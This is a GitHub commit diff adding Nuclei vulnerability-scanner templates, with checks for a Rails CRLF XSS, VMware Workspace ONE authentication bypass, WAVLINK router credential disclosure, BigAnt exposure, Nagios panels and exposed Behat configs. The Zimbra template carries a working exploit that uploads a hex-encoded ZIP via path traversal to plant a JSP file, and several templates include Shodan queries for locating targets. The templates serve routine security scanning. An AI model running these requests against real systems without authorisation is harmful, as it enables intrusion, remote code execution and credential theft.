-
Notifications
You must be signed in to change notification settings - Fork 643
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
416 changed files
with
17,739 additions
and
4,779 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,26 @@ | ||
| id: rails6-xss | ||
| info: | ||
| name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) | ||
| author: | ||
| - l0ne1y | ||
| requests: | ||
| - matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - javascript:alert(1) | ||
| - type: status | ||
| status: | ||
| - 302 | ||
| - type: word | ||
| condition: and | ||
| part: header | ||
| words: | ||
| - 'Location: javascript:alert(22)' | ||
| - text/html | ||
| matchers-condition: and | ||
| redirects: false | ||
| path: | ||
| - '{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0ajavascript:alert(22)' | ||
| method: POST | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| id: CVE-2022-23348 | ||
|
|
||
| info: | ||
| name: BigAnt Server v5.6.06 - Improper Access control | ||
| author: arafatansari | ||
| severity: medium | ||
| description: | | ||
| BigAnt Server v5.6.06 suffers from Use of Password Hash With Insufficient Computational Effort. | ||
| reference: | ||
| - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348 | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-23348 | ||
| - http://bigant.com | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | ||
| cvss-score: 5.3 | ||
| cve-id: CVE-2022-23348 | ||
| cwe-id: CWE-916 | ||
| metadata: | ||
| shodan-query: http.html:"bigant" | ||
| verified: "true" | ||
| tags: cve,cve2022,bigant,unauth,exposure | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/Runtime/Data/ms_admin.php" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - '"user_name";' | ||
| - '"user_pwd";' | ||
| - '"user_id";' | ||
| condition: and | ||
|
|
||
| - type: word | ||
| part: header | ||
| words: | ||
| - text/html | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| id: CVE-2022-31656 | ||
|
|
||
| info: | ||
| name: VMware - Authentication Bypass | ||
| author: DhiyaneshDk | ||
| severity: critical | ||
| description: | | ||
| VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. | ||
| reference: | ||
| - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd | ||
| - https://www.vmware.com/security/advisories/VMSA-2022-0021.html | ||
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656 | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-31656 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
| cvss-score: 9.8 | ||
| cve-id: CVE-2022-31656 | ||
| cwe-id: CWE-287 | ||
| metadata: | ||
| shodan-query: http.favicon.hash:-1250474341 | ||
| verified: "true" | ||
| tags: cve,cve2022,vmware,lfi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - "<web-app" | ||
| - "<servlet-name>" | ||
| condition: and | ||
|
|
||
| - type: word | ||
| part: header | ||
| words: | ||
| - "application/xml" | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,41 @@ | ||
| id: CVE-2022-31845 | ||
|
|
||
| info: | ||
| name: WAVLINK WN535 G3 - Information Disclosure | ||
| author: arafatansari | ||
| severity: high | ||
| description: | | ||
| A vulnerability in live_check.shtml of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to obtain sensitive router information via execution of the exec cmd function. | ||
| reference: | ||
| - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-31845 | ||
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
| cvss-score: 7.5 | ||
| cve-id: CVE-2022-31845 | ||
| cwe-id: CWE-668 | ||
| metadata: | ||
| shodan-query: http.html:"Wavlink" | ||
| verified: "true" | ||
| tags: cve,cve2022,wavlink,exposure | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| @timeout: 10s | ||
| GET /live_check.shtml HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - 'Model=' | ||
| - 'FW_Version=' | ||
| - 'LanIP=' | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,39 @@ | ||
| id: CVE-2022-31847 | ||
|
|
||
| info: | ||
| name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure | ||
| author: arafatansari | ||
| severity: high | ||
| description: | | ||
| A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request. | ||
| reference: | ||
| - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-31847 | ||
| classification: | ||
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
| cvss-score: 7.5 | ||
| cve-id: CVE-2022-31847 | ||
| cwe-id: CWE-668 | ||
| metadata: | ||
| shodan-query: http.html:"Wavlink" | ||
| verified: "true" | ||
| tags: cve,cve2022,wavlink,exposure | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh" | ||
|
|
||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| words: | ||
| - 'Login=' | ||
| - 'Password=' | ||
| - 'Model=' | ||
| - 'AuthMode=' | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,46 @@ | ||
| id: CVE-2022-37042 | ||
|
|
||
| info: | ||
| name: Zimbra Collaboration Suite - Unauthenticated RCE | ||
| author: _0xf4n9x_,For3stCo1d | ||
| severity: critical | ||
| description: | | ||
| Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. This issue exists because of an incomplete fix for CVE-2022-27925. | ||
| reference: | ||
| - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/ | ||
| - https://nvd.nist.gov/vuln/detail/CVE-2022-37042 | ||
| - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/ | ||
| - https://github.com/vnhacker1337/CVE-2022-27925-PoC | ||
| metadata: | ||
| fofa-query: app="zimbra-邮件系统" | ||
| shodan-query: http.favicon.hash:"1624375939" | ||
| tags: cve,cve2022,zimbra,rce,unauth,kev | ||
|
|
||
| requests: | ||
| - raw: | ||
| - | | ||
| POST {{path}} HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| Accept-Encoding: gzip, deflate | ||
| content-type: application/x-www-form-urlencoded | ||
| {{hex_decode("504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0304140008000800000000000000000000000000000000003d0000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a73701cc8bd0ac2301000e0bd4f510285042128b8555cfc5bc4163bb4743bdb4353cf24c64bf4f145d76f55642eb2f6c158262bc569b8b4e3bc3bc0046db3dc3e443ecb45957ad8dc3fc705d4bbaeeaa3506566f19d4f90401ba7f7865082f7640660e3acbe229f11a806bec980cf882ffe59832111f29f95527a444246a9caac587f030000ffff504b0708023fdd5d8500000089000000504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000000000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b0102140014000800080000000000023fdd5d85000000890000003d00000000000000000000000000f00000002e2e2f2e2e2f2e2e2f2e2e2f6d61696c626f78642f776562617070732f7a696d62726141646d696e2f304d567a4165367067776535676f31442e6a7370504b05060000000002000200d6000000e00100000000")}} | ||
| - | | ||
| GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 | ||
| Host: {{Hostname}} | ||
| payloads: | ||
| path: | ||
| - /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 | ||
| - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd | ||
|
|
||
| stop-at-first-match: true | ||
| req-condition: true | ||
| matchers: | ||
| - type: dsl | ||
| dsl: | ||
| - 'status_code_1 == 401' | ||
| - 'status_code_2 == 200' | ||
| - "contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')" | ||
| condition: and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,28 @@ | ||
| id: nagios-panel | ||
|
|
||
| info: | ||
| name: Nagios Panel Detect | ||
| author: ritikchaddha | ||
| severity: info | ||
| metadata: | ||
| verified: true | ||
| shodan-query: http.title:"nagios" | ||
| tags: panel,nagios | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/nagios" | ||
| - "{{BaseURL}}/nagios3" | ||
|
|
||
| stop-at-first-match: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: header | ||
| words: | ||
| - 'Nagios Access' | ||
|
|
||
| - type: status | ||
| status: | ||
| - 401 |
32 changes: 32 additions & 0 deletions
32
config/nuclei-templates/exposed-panels/nagios-xi-panel.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| id: nagios-xi-panel | ||
|
|
||
| info: | ||
| name: Nagios XI Panel Detect | ||
| author: ritikchaddha | ||
| severity: info | ||
| metadata: | ||
| verified: true | ||
| shodan-query: http.title:"Nagios XI" | ||
| tags: panel,nagios,nagios-xi | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}" | ||
| - "{{BaseURL}}/nagiosxi/login.php" | ||
|
|
||
| stop-at-first-match: true | ||
| redirects: true | ||
| max-redirects: 2 | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - 'alt="Nagios XI' | ||
| - '/nagiosxi/includes' | ||
| condition: or | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
32 changes: 32 additions & 0 deletions
32
config/nuclei-templates/exposures/configs/behat-config.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| id: behat-config | ||
|
|
||
| info: | ||
| name: Behat Configuration File Exposure | ||
| author: DhiyaneshDK | ||
| severity: low | ||
| metadata: | ||
| verified: true | ||
| shodan-query: html:"behat.yml" | ||
| reference: https://docs.behat.org/en/v2.5/guides/7.config.html | ||
| tags: exposure,behat,devops,cicd | ||
|
|
||
| requests: | ||
| - method: GET | ||
| path: | ||
| - "{{BaseURL}}/behat.yml" | ||
| - "{{BaseURL}}/behat.yml.dist" | ||
|
|
||
| stop-at-first-match: true | ||
| matchers-condition: and | ||
| matchers: | ||
| - type: word | ||
| part: body | ||
| words: | ||
| - 'default:' | ||
| - 'paths:' | ||
| - 'suites:' | ||
| condition: and | ||
|
|
||
| - type: status | ||
| status: | ||
| - 200 |
Oops, something went wrong.